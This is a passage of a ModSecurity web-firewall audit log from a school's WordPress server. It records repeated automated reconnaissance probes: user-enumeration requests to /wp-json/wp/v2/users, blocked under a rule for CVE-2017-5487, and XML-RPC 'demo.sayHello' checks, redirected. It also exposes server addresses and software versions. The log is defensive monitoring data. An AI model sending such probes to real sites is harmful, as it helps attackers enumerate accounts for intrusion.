"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462014376791 2573 (- - -) Stopwatch2: 1746462014376791 2573; combined=1200, p1=402, p2=770, p3=0, p4=0, p5=28, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ebcfa10-Z-- --7f2e323d-A-- [05/May/2025:23:20:15 +0700] aBjlP4ZWvR7-42f6JrAOyQAAANc 103.236.140.4 53418 103.236.140.4 8181 --7f2e323d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7f2e323d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f2e323d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462015519159 2972 (- - -) Stopwatch2: 1746462015519159 2972; combined=1284, p1=423, p2=826, p3=0, p4=0, p5=34, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f2e323d-Z-- --9297e343-A-- [05/May/2025:23:20:17 +0700] aBjlQQRwKNFSM6B7_LaiBwAAAJc 103.236.140.4 53440 103.236.140.4 8181 --9297e343-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9297e343-C-- demo.sayHello --9297e343-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9297e343-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462017153259 4073 (- - -) Stopwatch2: 1746462017153259 4073; combined=2914, p1=388, p2=2367, p3=22, p4=25, p5=65, sr=52, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9297e343-Z-- --01323650-A-- [05/May/2025:23:20:18 +0700] aBjlQoZWvR7-42f6JrAO0QAAAM8 103.236.140.4 53450 103.236.140.4 8181 --01323650-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01323650-C-- demo.sayHello --01323650-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01323650-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462018296991 5513 (- - -) Stopwatch2: 1746462018296991 5513; combined=4092, p1=528, p2=3343, p3=33, p4=34, p5=91, sr=93, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01323650-Z-- --5eff8518-A-- [05/May/2025:23:24:29 +0700] aBjmPQRwKNFSM6B7_LailgAAAJg 103.236.140.4 55674 103.236.140.4 8181 --5eff8518-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5eff8518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eff8518-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462269226648 2178 (- - -) Stopwatch2: 1746462269226648 2178; combined=1191, p1=388, p2=772, p3=0, p4=0, p5=30, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eff8518-Z-- --e5d0aa37-A-- [05/May/2025:23:24:32 +0700] aBjmQIZWvR7-42f6JrAPWgAAAMM 103.236.140.4 55702 103.236.140.4 8181 --e5d0aa37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.8 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e5d0aa37-C-- demo.sayHello --e5d0aa37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5d0aa37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462272330373 5602 (- - -) Stopwatch2: 1746462272330373 5602; combined=4181, p1=519, p2=3441, p3=31, p4=35, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5d0aa37-Z-- --cbb93e12-A-- [05/May/2025:23:24:34 +0700] aBjmQoZWvR7-42f6JrAPXQAAAM0 103.236.140.4 55726 103.236.140.4 8181 --cbb93e12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cbb93e12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbb93e12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462274922656 2714 (- - -) Stopwatch2: 1746462274922656 2714; combined=1255, p1=408, p2=818, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbb93e12-Z-- --f3006570-A-- [05/May/2025:23:24:37 +0700] aBjmRQRwKNFSM6B7_LaimAAAAJQ 103.236.140.4 55758 103.236.140.4 8181 --f3006570-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f3006570-C-- demo.sayHello --f3006570-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3006570-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462277669037 5463 (- - -) Stopwatch2: 1746462277669037 5463; combined=4266, p1=533, p2=3502, p3=32, p4=36, p5=96, sr=90, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3006570-Z-- --652d425f-A-- [05/May/2025:23:25:21 +0700] aBjmcQRwKNFSM6B7_LaitwAAAIg 103.236.140.4 56242 103.236.140.4 8181 --652d425f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --652d425f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --652d425f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462321765792 2911 (- - -) Stopwatch2: 1746462321765792 2911; combined=1498, p1=558, p2=906, p3=0, p4=0, p5=33, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --652d425f-Z-- --be0c3c68-A-- [05/May/2025:23:25:25 +0700] aBjmdU2V_h1VFAgsfgZ_ugAAAAw 103.236.140.4 56282 103.236.140.4 8181 --be0c3c68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --be0c3c68-C-- demo.sayHello --be0c3c68-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --be0c3c68-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462325170165 5930 (- - -) Stopwatch2: 1746462325170165 5930; combined=4465, p1=606, p2=3625, p3=35, p4=34, p5=96, sr=131, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be0c3c68-Z-- --25c72370-A-- [05/May/2025:23:26:21 +0700] aBjmrU2V_h1VFAgsfgZ_7gAAAAA 103.236.140.4 56898 103.236.140.4 8181 --25c72370-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --25c72370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25c72370-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462381441458 2735 (- - -) Stopwatch2: 1746462381441458 2735; combined=1230, p1=417, p2=783, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25c72370-Z-- --46c91c76-A-- [05/May/2025:23:26:24 +0700] aBjmsARwKNFSM6B7_Lai5QAAAJY 103.236.140.4 56934 103.236.140.4 8181 --46c91c76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --46c91c76-C-- demo.sayHello --46c91c76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --46c91c76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462384562361 5048 (- - -) Stopwatch2: 1746462384562361 5048; combined=3780, p1=478, p2=3085, p3=30, p4=33, p5=91, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46c91c76-Z-- --d4fb056d-A-- [05/May/2025:23:26:47 +0700] aBjmx_ZJDMuQndL03JNf6wAAAEs 103.236.140.4 57102 103.236.140.4 8181 --d4fb056d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d4fb056d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4fb056d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462407859477 2382 (- - -) Stopwatch2: 1746462407859477 2382; combined=977, p1=350, p2=607, p3=0, p4=0, p5=20, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4fb056d-Z-- --9613357c-A-- [05/May/2025:23:26:50 +0700] aBjmyvZJDMuQndL03JNf7QAAAEI 103.236.140.4 57130 103.236.140.4 8181 --9613357c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9613357c-C-- demo.sayHello --9613357c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9613357c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462410589115 5764 (- - -) Stopwatch2: 1746462410589115 5764; combined=4253, p1=552, p2=3466, p3=36, p4=36, p5=97, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9613357c-Z-- --204d1665-A-- [05/May/2025:23:26:52 +0700] aBjmzIZWvR7-42f6JrAPqgAAANc 103.236.140.4 57150 103.236.140.4 8181 --204d1665-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --204d1665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --204d1665-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462412587878 2927 (- - -) Stopwatch2: 1746462412587878 2927; combined=1273, p1=419, p2=820, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --204d1665-Z-- --c03b2979-A-- [05/May/2025:23:26:55 +0700] aBjmzwRwKNFSM6B7_Lai8QAAAIs 103.236.140.4 57182 103.236.140.4 8181 --c03b2979-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.253 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c03b2979-C-- demo.sayHello --c03b2979-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c03b2979-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462415653775 5533 (- - -) Stopwatch2: 1746462415653775 5533; combined=4137, p1=557, p2=3360, p3=31, p4=34, p5=91, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c03b2979-Z-- --ae39264a-A-- [05/May/2025:23:26:58 +0700] aBjm0vZJDMuQndL03JNf9QAAAEc 103.236.140.4 57214 103.236.140.4 8181 --ae39264a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae39264a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae39264a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462418380242 2661 (- - -) Stopwatch2: 1746462418380242 2661; combined=1220, p1=414, p2=777, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae39264a-Z-- --0316657e-A-- [05/May/2025:23:27:01 +0700] aBjm1fZJDMuQndL03JNf-gAAAFM 103.236.140.4 57234 103.236.140.4 8181 --0316657e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.167 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0316657e-C-- demo.sayHello --0316657e-F-- HTTP/1.1 301 Moved Permanently Location: 